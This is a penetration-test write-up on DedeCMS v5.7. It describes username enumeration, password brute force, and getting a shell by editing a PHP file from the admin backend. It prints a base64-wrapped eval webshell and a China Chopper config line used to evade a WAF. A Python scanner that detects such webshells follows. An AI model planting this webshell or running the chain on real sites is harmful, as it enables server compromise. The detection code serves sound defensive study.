Notes from a DedeCMS (织梦 CMS) Penetration Test
0x01 Foreword
The overall flow of this test: username enumeration, targeted brute force of the password, login to the admin backend, editing a PHP file from the backend to getshell.
0x02 Process
1. The login module has a username enumeration flaw; use it to enumerate valid usernames.
2. The login module has no CAPTCHA, so the password of the enumerated username can be brute-forced. Log in to the backend (DedeCMS v5.7).
3. Then the pitfalls begin. Uploading files through the file manager and adding a new advertisement both fail to getshell (apparently a WAF): the action results in a connection reset.
4. Try editing an existing file directly and writing code into it.
(1) Writing phpinfo(); succeeds.
(2) Writing a conventional one-line webshell succeeds, but when it is executed the connection is reset.
(3) Writing a base64-encoded one-liner, <?php @eval(base64_decode($_POST['0nth3way'])); ?>, succeeds, and the encoded data executes normally afterwards.
5. Modify the Caidao (China Chopper) configuration file caidao.conf as below, and the one-line shell can be connected.
<PHP_BASE> ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s </PHP_BASE>
6. Caidao connects to the one-liner successfully. Privileges: IIS user.
7. A process named wkds.exe is visible; it looks like protection software. Did not dig into it.
8. Follow-up the next day.
(1) The shell is still there and Caidao still connects. phpinfo() can be executed, but system('whoami') cannot, even though phpinfo shows the relevant functions are not disabled. Puzzled??? Looking for an answer 0.0
(2) Files can no longer be edited from the backend.
0x03 Postscript
Take-aways from this test:
(1) Encoding the traffic data may bypass the WAF; change the Chopper configuration to connect.
(2) Carpe diem
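From the defender's side, steps 4 and 5 and take-away (1) show why a WAF that only matches the plain-text one-liner is not enough: the same eval() over request data survives once it is wrapped in base64. The following is an added example, not code from this write-up or from DedeCMS, of a file-integrity style audit that scans PHP source for dangerous calls fed by request input and also decodes base64 string literals before applying the same rules, so the encoded form is caught too. The sample file contents and paths are constructed for this example; the only payload taken from the write-up is the base64-wrapped one-liner in step 4(3).

```python
import base64
import re

# Constructed sample PHP sources (paths and contents are assumptions for this example).
SAMPLE_FILES = {
    "sample/benign.php": "<?php\necho 'hello';\n",
    # The base64-wrapped one-liner from the write-up: eval() over decoded request data.
    "sample/encoded_input_shell.php": "<?php @eval(base64_decode($_POST['0nth3way'])); ?>",
    # Variant where the whole payload is a base64 literal that decodes to an eval over $_POST.
    "sample/encoded_literal_shell.php": (
        "<?php\n$x = base64_decode('" + base64.b64encode(b"eval($_POST['c']);").decode() + "');\n"
        "eval($x);\n"
    ),
    "sample/info.php": "<?php phpinfo(); ?>",
}

DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function)\s*\(", re.I)
SUPERGLOBAL = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b", re.I)
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
B64_OF_INPUT = re.compile(r"base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)


def decode_b64_literals(src):
    """Return the decoded text of every base64 string literal passed to base64_decode()."""
    out = []
    for m in B64_LITERAL.finditer(src):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (ValueError, base64.binascii.Error):
            pass  # not valid base64; a plain-text match will still be caught above
    return out


def scan_php_source(src):
    """Return a list of finding labels for one PHP source text (empty list = nothing suspicious)."""
    findings = []
    # Plain-text pattern: a dangerous call and request input present in the same file.
    if DANGEROUS_CALLS.search(src) and SUPERGLOBAL.search(src):
        findings.append("dangerous-call-with-request-input")
    # Request input passed straight into base64_decode (the WAF-evading form from step 4(3)).
    if B64_OF_INPUT.search(src):
        findings.append("base64_decode-over-request-input")
    # Base64 literals are decoded and checked with the same rules, so encoding does not hide them.
    for decoded in decode_b64_literals(src):
        if DANGEROUS_CALLS.search(decoded) or SUPERGLOBAL.search(decoded):
            findings.append("encoded-payload-in-literal")
            break
    # phpinfo() left in a web root leaks configuration (step 4(1) of the write-up).
    if re.search(r"\bphpinfo\s*\(", src, re.I):
        findings.append("phpinfo-exposure")
    return findings


def scan_files(files):
    """Scan a mapping of path -> PHP source; return only the paths that have findings."""
    return {path: f for path, f in ((p, scan_php_source(s)) for p, s in files.items()) if f}


if __name__ == "__main__":
    for path, findings in sorted(scan_files(SAMPLE_FILES).items()):
        print(f"{path}: {', '.join(findings)}")
```

Run against a real web root, this is most useful as a diff: scan the files that changed since the last known-good snapshot (the backend "edit file" feature in step 4 modifies existing files in place, which a write-time hash comparison flags even when the content is encoded). The decode step is deliberately limited to string literals; input that arrives at run time, as in step 4(3), is flagged by the base64_decode-over-request-input rule instead.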